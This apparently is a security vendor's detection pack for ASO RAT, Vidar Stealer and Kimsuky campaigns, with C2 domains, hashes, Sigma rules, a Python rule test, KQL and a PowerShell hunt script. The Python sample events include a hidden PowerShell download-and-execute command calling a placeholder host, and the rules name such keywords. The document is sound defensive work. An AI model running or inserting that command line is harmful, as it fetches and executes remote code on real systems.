
ASO RAT, Vidar Stealer Loader, and Kimsuky APT Campaigns: OTX Pulse Analysis — Enterprise Detection Pack

Security Arsenal Team
May 13, 2026

Recent OTX pulses highlight a convergence of high-fidelity threats ranging from mobile surveillance to sophisticated credential theft and state-sponsored espionage. Activity includes the deployment of ASO RAT, an Arabic-language Android surveillance tool targeting Syrian entities; a Vidar Stealer campaign utilizing AutoIt loaders and process masquerading; and Kimsuky (APT43) leveraging CHM droppers to deploy PowerShell keyloggers. Collectively, these campaigns emphasize the abuse of legitimate scripting environments (AutoIt, PowerShell, VBScript) and infrastructure misconfigurations (open directory listing) to establish persistence and exfiltrate sensitive data.

Threat Actor / Malware Profile

ASO RAT (Android Surveillance)

  • Distribution: Disguised as PDF readers or Syrian government applications via APK builder tooling.
  • Behavior: Comprehensive device compromise including SMS interception, camera/mic activation, GPS tracking, and DDoS-for-hire capabilities.
  • C2 Infrastructure: Utilizes DDNS (aso.ddns.net) resolving to Frankfurt-based infrastructure.

Vidar Stealer (Windows)

  • Distribution: Multi-stage loader starting with MicrosoftToolkit.exe.
  • Technique: Renames .dot files to .bat for execution (masquerading). Abuses AutoIt scripting.
  • Behavior: Performs process discovery, terminates security-related processes (Defense Evasion), and injects payloads for credential harvesting.
  • C2 Communication: Connects to gz.technicalprorj.xyz.

Kimsuky (APT43)

  • Distribution: Spear-phishing involving CHM files (e.g., api_reference.chm).
  • Technique: "Living off the Land" using CHM droppers to execute VBScript stagers and PowerShell keyloggers.
  • Behavior: Establishes persistence via Scheduled Tasks. The C2 server check.nid-log.com had directory listing enabled, exposing the full attack chain source code.

IOC Analysis

The provided indicators span multiple vectors requiring layered defense:

  • Network: Hostnames and Domains (e.g., aso.ddns.net, gz.technicalprorj.xyz, withheldforprivacy.com) should be blocked at the perimeter and DNS layer. These indicate active C2 infrastructure.
  • File Hashes: A mix of MD5, SHA1, and SHA256 hashes for droppers, loaders, and final payloads. SOC teams should use EDR telemetry to hunt for these specific hashes on endpoints.
  • CVEs: CVE-2023-44487 and CVE-2025-23419 are associated with the ASO RAT campaign; while the direct exploit vector isn't detailed, patching against these is critical to prevent initial access or infrastructure compromise.

Detection Engineering

```yaml
title: Suspicious AutoIt Execution Leading to Vidar Stealer
id: 8c7a2d1e-9b4f-4a1c-8d5e-1f2a3b4c5d6e
description: Detects execution of AutoIt scripts often used in Vidar Stealer loaders, specifically looking for MicrosoftToolkit or the .dot-to-.bat process masquerading pattern.
status: experimental
date: 2026/05/13
author: Security Arsenal
logsource:
    category: process_creation
    product: windows
detection:
    selection_autoit:
        Image|endswith: '\AutoIt3.exe'
    selection_loader:
        CommandLine|contains: 'MicrosoftToolkit.exe'
    selection_masquerade:
        # Both extensions must appear in one command line (rename .dot -> .bat and run it);
        # a bare '.bat' term would fire on every legitimate batch job
        CommandLine|contains|all:
            - '.dot'
            - '.bat'
    condition: 1 of selection_*
falsepositives:
    - Legitimate administration scripts using AutoIt
level: high
tags:
    - attack.defense_evasion
    - attack.t1036
    - attack.execution
    - attack.t1059.001
---
title: Kimsuky CHM Dropper and PowerShell Keylogger Activity
id: 9d8b3e2f-0c5a-4b2d-9e6f-2a3b4c5d6e7f
description: Detects PowerShell spawned by the Compiled HTML Help viewer (hh.exe) with a download-and-execute command line, indicative of the Kimsuky NIDLog attack chain.
status: experimental
date: 2026/05/13
author: Security Arsenal
logsource:
    category: process_creation
    product: windows
detection:
    # Sigma has no "followed by" correlation inside a single rule; the parent/child
    # relationship in the process_creation event expresses the same chain. If the
    # VBScript stager sits between, extend selection_parent with '\wscript.exe'.
    selection_parent:
        ParentImage|endswith: '\hh.exe'
    selection_powershell:
        Image|endswith: '\powershell.exe'
        CommandLine|contains:
            - 'DownloadString'
            - 'Invoke-Expression'
    condition: selection_parent and selection_powershell
falsepositives:
    - Viewing legitimate help documentation that triggers scripts
level: critical
tags:
    - attack.initial_access
    - attack.t1566.001
    - attack.persistence
    - attack.t1053.005
---
title: ASO RAT and Kimsuky C2 Network Connections
id: 0e1f4a3b-5d6e-7f8a-9b0c-1d2e3f4a5b6c
description: Identifies network connections to known Command and Control infrastructure associated with ASO RAT and Kimsuky campaigns.
status: experimental
date: 2026/05/13
author: Security Arsenal
logsource:
    category: network_connection
    product: windows
detection:
    selection_c2:
        DestinationHostname|contains:
            - 'aso.ddns.net'
            - 'technicalprorj.xyz'
            - 'nid-log.com'
            - 'withheldforprivacy.com'
            - 'noreplymail.space'
    condition: selection_c2
falsepositives:
    - Unlikely, these are specific DDNS and C2 domains
level: critical
tags:
    - attack.command_and_control
    - attack.t1071.001
```
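
To check that the three rule conditions behave as intended before they go into a SIEM, the following Python, an added example that is not part of the original detection pack, reimplements them as plain predicates and runs them over constructed Sysmon-style events, including an ordinary batch job that a bare `.bat` match would have flagged. The `Event` class, `evaluate` helper and sample telemetry are assumptions made for illustration.

```python
from dataclasses import dataclass
# Hostnames from the network_connection rule above.
C2_DOMAINS = ("aso.ddns.net", "technicalprorj.xyz", "nid-log.com",
              "withheldforprivacy.com", "noreplymail.space")

@dataclass
class Event:
    kind: str            # "process" (process_creation) or "network" (network_connection)
    image: str = ""
    parent_image: str = ""
    cmdline: str = ""
    dest_host: str = ""

def vidar_loader(e):
    """Rule 1: AutoIt3.exe, MicrosoftToolkit.exe, or .dot AND .bat in one command line."""
    img, cl = e.image.lower(), e.cmdline.lower()
    return e.kind == "process" and (img.endswith("\\autoit3.exe")
            or "microsofttoolkit.exe" in cl or (".dot" in cl and ".bat" in cl))

def kimsuky_chm_chain(e):
    """Rule 2: powershell.exe spawned by hh.exe with a download/eval keyword in its command line."""
    cl = e.cmdline.lower()
    return (e.kind == "process" and e.parent_image.lower().endswith("\\hh.exe")
            and e.image.lower().endswith("\\powershell.exe")
            and ("downloadstring" in cl or "invoke-expression" in cl))

def c2_connection(e):
    """Rule 3: destination hostname contains one of the listed C2 domains."""
    return e.kind == "network" and any(d in e.dest_host.lower() for d in C2_DOMAINS)

RULES = {"vidar_loader": vidar_loader, "kimsuky_chm_chain": kimsuky_chm_chain,
         "c2_connection": c2_connection}

def evaluate(events):  # rule name -> indexes of the events it fires on
    return {name: [i for i, e in enumerate(events) if rule(e)] for name, rule in RULES.items()}

# Constructed sample telemetry (not real incident data); example.invalid is a placeholder host.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE = [
    Event("process", image=r"C:\Windows\hh.exe", parent_image=r"C:\Windows\explorer.exe",
          cmdline=r'"C:\Windows\hh.exe" C:\Users\u\Downloads\api_reference.chm'),  # CHM opened, no child yet
    Event("process", image=PS, parent_image=r"C:\Windows\hh.exe",
          cmdline="powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/k')"),
    Event("process", image=r"C:\Windows\System32\cmd.exe", parent_image=r"C:\Temp\MicrosoftToolkit.exe",
          cmdline="cmd /c ren update.dot update.bat && update.bat"),  # .dot -> .bat masquerade
    Event("process", image=r"C:\Windows\System32\cmd.exe", parent_image=r"C:\Windows\explorer.exe",
          cmdline=r"cmd /c C:\scripts\nightly_backup.bat"),  # ordinary batch job: must NOT fire
    Event("network", dest_host="gz.technicalprorj.xyz"), Event("network", dest_host="www.microsoft.com"),
]
print(evaluate(SAMPLE))  # → {'vidar_loader': [2], 'kimsuky_chm_chain': [1], 'c2_connection': [4]}
```

Note that the second event is caught only by `DownloadString`: the `IEX` alias does not match a literal `Invoke-Expression` string, so the keyword list is a coverage floor, not a ceiling.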


```kql
// Hunt for Vidar and Kimsuky Indicators of Compromise
// Search for C2 domains in network events
DeviceNetworkEvents
| where RemoteUrl has_any ("aso.ddns.net", "technicalprorj.xyz", "nid-log.com", "noreplymail.space", "uncork.biz")
| project Timestamp, DeviceName, InitiatingProcessFileName, RemoteUrl, RemoteIP
| extend IoC_Type = "C2_Domain"
| union (
    DeviceProcessEvents
    // Hunt for AutoIt abuse, CHM execution, and the .dot -> .bat rename pattern
    // (has_any is the KQL operator; contains_any does not exist)
    | where FileName in~ ("AutoIt3.exe", "hh.exe")
        or ProcessCommandLine has_any ("MicrosoftToolkit", "api_reference.chm")
        or (ProcessCommandLine contains ".dot" and ProcessCommandLine contains ".bat")
    | project Timestamp, DeviceName, FileName, ProcessCommandLine, FolderPath
    | extend IoC_Type = "Suspicious_Process"
)
| order by Timestamp desc
```


```powershell
# IOC Hunt Script: ASO RAT, Vidar, and Kimsuky Persistence
# Checks for file hashes, scheduled tasks, and suspicious executables.
# Run from an elevated session; the full-disk hash sweep at the end is slow, so scope $Drives if needed.

# The indicator list mixes MD5 (32 hex chars) and SHA256 (64 hex chars), so both algorithms are computed
# below. Values are upper-cased because Get-FileHash returns uppercase hex.
$MaliciousHashes = @(
    "31514358bf684a1e466a9e8069c11031",
    "b3e706ba673cfeb9d205fb97b0ac624c",
    "c3315d582e71412e830e019d036d811d",
    "7ac9278876c83c9b597fae68acb6fbf9",
    "4599ac1bbe483c73064df1353feafd01",
    "7047878f4fbea323148f6554afe616991eb56cc327653972c4213a9017c5e66b"
) | ForEach-Object { $_.ToUpper() }
$Md5Set    = @($MaliciousHashes | Where-Object { $_.Length -eq 32 })
$Sha256Set = @($MaliciousHashes | Where-Object { $_.Length -eq 64 })

Write-Host "[+] Scanning for Scheduled Tasks associated with Kimsuky..."
# Actions is a collection of CIM objects; match on the Execute/Arguments text, not on the object itself
$SuspiciousTasks = Get-ScheduledTask | Where-Object {
    $ActionText = ($_.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join ' '
    $_.TaskName -match "api" -or $ActionText -match "nid-log|BitJoker"
}

if ($SuspiciousTasks) {
    Write-Host "[!] Potential Kimsuky Persistence Found:" -ForegroundColor Red
    $SuspiciousTasks | Select-Object TaskName, State, Author | Format-Table
} else {
    Write-Host "[-] No suspicious scheduled tasks found."
}

Write-Host "[+] Scanning for AutoIt executables (Vidar Loader)..."
$AutoItFiles = Get-ChildItem -Path C:\ -Recurse -File -Filter "*.exe" -ErrorAction SilentlyContinue |
    Where-Object { $_.Name -like "*AutoIt*" -or $_.Name -like "*MicrosoftToolkit*" }
if ($AutoItFiles) {
    Write-Host "[!] AutoIt or Loader executables found:" -ForegroundColor Yellow
    $AutoItFiles | Select-Object FullName, Length | Format-Table
}

Write-Host "[+] Checking file hashes against known malware IOCs..."
$Drives = Get-PSDrive -PSProvider FileSystem
foreach ($Drive in $Drives) {
    # -File skips directories, which Get-FileHash cannot hash
    Get-ChildItem -Path $Drive.Root -Recurse -File -ErrorAction SilentlyContinue | ForEach-Object {
        if ($_.Length -gt 0) {
            $Md5    = (Get-FileHash -LiteralPath $_.FullName -Algorithm MD5 -ErrorAction SilentlyContinue).Hash
            $Sha256 = (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
            if (($Md5 -and $Md5Set -contains $Md5) -or ($Sha256 -and $Sha256Set -contains $Sha256)) {
                Write-Host "[!] MALICIOUS FILE DETECTED: $($_.FullName)" -ForegroundColor Red
            }
        }
    }
}
Write-Host "[+] Hunt complete."
```


Response Priorities

Immediate

  • Block all listed C2 domains and hostnames (aso.ddns.net, gz.technicalprorj.xyz, nid-log.com) at the network edge and proxy.
  • Initiate a hunt for the file hashes provided in the Pulse data across all endpoints.
  • Isolate any systems showing signs of hh.exe spawning PowerShell or AutoIt3.exe execution.

24 Hours

  • If Vidar Stealer indicators are found, initiate forced password resets for credentials stored on affected machines and monitor for lateral movement.
  • Review logs for connections to withheldforprivacy.com or noreplymail.space.

1 Week

  • Review policy on AutoIt usage within the enterprise; consider blocking or restricting AutoIt3.exe execution via AppLocker.
  • Patch systems against CVE-2023-44487 and CVE-2025-23419 to mitigate potential infrastructure exploit risks.
  • Conduct a security awareness briefing regarding CHM file phishing and suspicious APK downloads.
